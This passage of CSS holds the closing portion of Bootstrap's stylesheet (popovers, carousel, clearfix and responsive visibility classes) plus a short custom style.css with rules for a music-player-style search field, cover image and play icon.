content: " "; border-right-color: #fff; border-left-width: 0; } .popover.bottom .arrow { top: -11px; left: 50%; margin-left: -11px; border-top-width: 0; border-bottom-color: #999; border-bottom-color: rgba(0, 0, 0, .25); } .popover.bottom .arrow:after { top: 1px; margin-left: -10px; content: " "; border-top-width: 0; border-bottom-color: #fff; } .popover.left .arrow { top: 50%; right: -11px; margin-top: -11px; border-right-width: 0; border-left-color: #999; border-left-color: rgba(0, 0, 0, .25); } .popover.left .arrow:after { right: 1px; bottom: -10px; content: " "; border-right-width: 0; border-left-color: #fff; } .carousel { position: relative; } .carousel-inner { position: relative; width: 100%; overflow: hidden; } .carousel-inner > .item { position: relative; display: none; -webkit-transition: .6s ease-in-out left; transition: .6s ease-in-out left; } .carousel-inner > .item > img, .carousel-inner > .item > a > img { display: block; max-width: 100%; height: auto; line-height: 1; } .carousel-inner > .active, .carousel-inner > .next, .carousel-inner > .prev { display: block; } .carousel-inner > .active { left: 0; } .carousel-inner > .next, .carousel-inner > .prev { position: absolute; top: 0; width: 100%; } .carousel-inner > .next { left: 100%; } .carousel-inner > .prev { left: -100%; } .carousel-inner > .next.left, .carousel-inner > .prev.right { left: 0; } .carousel-inner > .active.left { left: -100%; } .carousel-inner > .active.right { left: 100%; } .carousel-control { position: absolute; top: 0; bottom: 0; left: 0; width: 15%; font-size: 20px; color: #fff; text-align: center; text-shadow: 0 1px 2px rgba(0, 0, 0, .6); filter: alpha(opacity=50); opacity: .5; } .carousel-control.left { background-image: -webkit-linear-gradient(left, color-stop(rgba(0, 0, 0, .5) 0%), color-stop(rgba(0, 0, 0, .0001) 100%)); background-image: linear-gradient(to right, rgba(0, 0, 0, .5) 0%, rgba(0, 0, 0, .0001) 100%); filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1); background-repeat: repeat-x; } .carousel-control.right { right: 0; left: auto; background-image: -webkit-linear-gradient(left, color-stop(rgba(0, 0, 0, .0001) 0%), color-stop(rgba(0, 0, 0, .5) 100%)); background-image: linear-gradient(to right, rgba(0, 0, 0, .0001) 0%, rgba(0, 0, 0, .5) 100%); filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1); background-repeat: repeat-x; } .carousel-control:hover, .carousel-control:focus { color: #fff; text-decoration: none; filter: alpha(opacity=90); outline: none; opacity: .9; } .carousel-control .icon-prev, .carousel-control .icon-next, .carousel-control .glyphicon-chevron-left, .carousel-control .glyphicon-chevron-right { position: absolute; top: 50%; z-index: 5; display: inline-block; } .carousel-control .icon-prev, .carousel-control .glyphicon-chevron-left { left: 50%; } .carousel-control .icon-next, .carousel-control .glyphicon-chevron-right { right: 50%; } .carousel-control .icon-prev, .carousel-control .icon-next { width: 20px; height: 20px; margin-top: -10px; margin-left: -10px; font-family: serif; } .carousel-control .icon-prev:before { content: '\2039'; } .carousel-control .icon-next:before { content: '\203a'; } .carousel-indicators { position: absolute; bottom: 10px; left: 50%; z-index: 15; width: 60%; padding-left: 0; margin-left: -30%; text-align: center; list-style: none; } .carousel-indicators li { display: inline-block; width: 10px; height: 10px; margin: 1px; text-indent: -999px; cursor: pointer; background-color: #000 \9; background-color: rgba(0, 0, 0, 0); border: 1px solid #fff; border-radius: 10px; } .carousel-indicators .active { width: 12px; height: 12px; margin: 0; background-color: #fff; } .carousel-caption { position: absolute; right: 15%; bottom: 20px; left: 15%; z-index: 10; padding-top: 20px; padding-bottom: 20px; color: #fff; text-align: center; text-shadow: 0 1px 2px rgba(0, 0, 0, .6); } .carousel-caption .btn { text-shadow: none; } @media screen and (min-width: 768px) { .carousel-control .glyphicons-chevron-left, .carousel-control .glyphicons-chevron-right, .carousel-control .icon-prev, .carousel-control .icon-next { width: 30px; height: 30px; margin-top: -15px; margin-left: -15px; font-size: 30px; } .carousel-caption { right: 20%; left: 20%; padding-bottom: 30px; } .carousel-indicators { bottom: 20px; } } .clearfix:before, .clearfix:after, .container:before, .container:after, .container-fluid:before, .container-fluid:after, .row:before, .row:after, .form-horizontal .form-group:before, .form-horizontal .form-group:after, .btn-toolbar:before, .btn-toolbar:after, .btn-group-vertical > .btn-group:before, .btn-group-vertical > .btn-group:after, .nav:before, .nav:after, .navbar:before, .navbar:after, .navbar-header:before, .navbar-header:after, .navbar-collapse:before, .navbar-collapse:after, .pager:before, .pager:after, .panel-body:before, .panel-body:after, .modal-footer:before, .modal-footer:after { display: table; content: " "; } .clearfix:after, .container:after, .container-fluid:after, .row:after, .form-horizontal .form-group:after, .btn-toolbar:after, .btn-group-vertical > .btn-group:after, .nav:after, .navbar:after, .navbar-header:after, .navbar-collapse:after, .pager:after, .panel-body:after, .modal-footer:after { clear: both; } .center-block { display: block; margin-right: auto; margin-left: auto; } .pull-right { float: right !important; } .pull-left { float: left !important; } .hide { display: none !important; } .show { display: block !important; } .invisible { visibility: hidden; } .text-hide { font: 0/0 a; color: transparent; text-shadow: none; background-color: transparent; border: 0; } .hidden { display: none !important; visibility: hidden !important; } .affix { position: fixed; } @-ms-viewport { width: device-width; } .visible-xs, tr.visible-xs, th.visible-xs, td.visible-xs { display: none !important; } @media (max-width: 767px) { .visible-xs { display: block !important; } table.visible-xs { display: table; } tr.visible-xs { display: table-row !important; } th.visible-xs, td.visible-xs { display: table-cell !important; } } .visible-sm, tr.visible-sm, th.visible-sm, td.visible-sm { display: none !important; } @media (min-width: 768px) and (max-width: 991px) { .visible-sm { display: block !important; } table.visible-sm { display: table; } tr.visible-sm { display: table-row !important; } th.visible-sm, td.visible-sm { display: table-cell !important; } } .visible-md, tr.visible-md, th.visible-md, td.visible-md { display: none !important; } @media (min-width: 992px) and (max-width: 1199px) { .visible-md { display: block !important; } table.visible-md { display: table; } tr.visible-md { display: table-row !important; } th.visible-md, td.visible-md { display: table-cell !important; } } .visible-lg, tr.visible-lg, th.visible-lg, td.visible-lg { display: none !important; } @media (min-width: 1200px) { .visible-lg { display: block !important; } table.visible-lg { display: table; } tr.visible-lg { display: table-row !important; } th.visible-lg, td.visible-lg { display: table-cell !important; } } @media (max-width: 767px) { .hidden-xs, tr.hidden-xs, th.hidden-xs, td.hidden-xs { display: none !important; } } @media (min-width: 768px) and (max-width: 991px) { .hidden-sm, tr.hidden-sm, th.hidden-sm, td.hidden-sm { display: none !important; } } @media (min-width: 992px) and (max-width: 1199px) { .hidden-md, tr.hidden-md, th.hidden-md, td.hidden-md { display: none !important; } } @media (min-width: 1200px) { .hidden-lg, tr.hidden-lg, th.hidden-lg, td.hidden-lg { display: none !important; } } .visible-print, tr.visible-print, th.visible-print, td.visible-print { display: none !important; } @media print { .visible-print { display: block !important; } table.visible-print { display: table; } tr.visible-print { display: table-row !important; } th.visible-print, td.visible-print { display: table-cell !important; } } @media print { .hidden-print, tr.hidden-print, th.hidden-print, td.hidden-print { display: none !important; } } /*# sourceMappingURL=bootstrap.css.map */
css/style.css
bordstein/mops
.visible-portrait-xs { display: none; } @media screen and (max-width: 767px) and (orientation:portrait) { .content { padding-top: 50px; } .visible-portrait-xs { display: block; } } #searchfield > button{ float: right; } #searchfield > input{ width: calc(100% - 50px); } .currentinfo-top { font-weight: bold; font-size: 15px; } .playicon-wrapper { width: 16px; padding-left: 4px; } #coverimg { max-width: 100%; }